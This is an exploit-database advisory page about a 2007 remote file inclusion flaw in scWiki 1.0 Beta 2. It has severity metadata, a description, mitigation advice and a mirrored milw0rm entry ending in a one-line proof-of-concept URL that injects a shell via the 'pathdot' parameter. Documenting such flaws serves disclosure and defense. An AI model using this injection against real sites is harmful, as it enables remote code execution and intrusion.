header-logo
Suggest Exploit
vendor:
scWiki
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: scWiki
Affected Version From: 1.0 Beta 2
Affected Version To: 1.0 Beta 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vulnerability

The scWiki 1.0 Beta 2 is vulnerable to a remote file inclusion vulnerability in the 'common.php' file. An attacker can exploit this vulnerability by manipulating the 'pathdot' parameter in the 'common.php' file, allowing them to include arbitrary remote files. This can lead to remote code execution or unauthorized access to sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of scWiki or apply the vendor-supplied patch. Additionally, ensure that input validation and sanitization measures are in place to prevent malicious input from being passed to the 'pathdot' parameter.
Source

Exploit-DB raw data:

scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/sc-wiki/scwiki_beta2.zip
POC :
    /includes/common.php?pathdot=Shell

# milw0rm.com [2007-11-03]

Navigation

Suggest Exploit

Services By CQR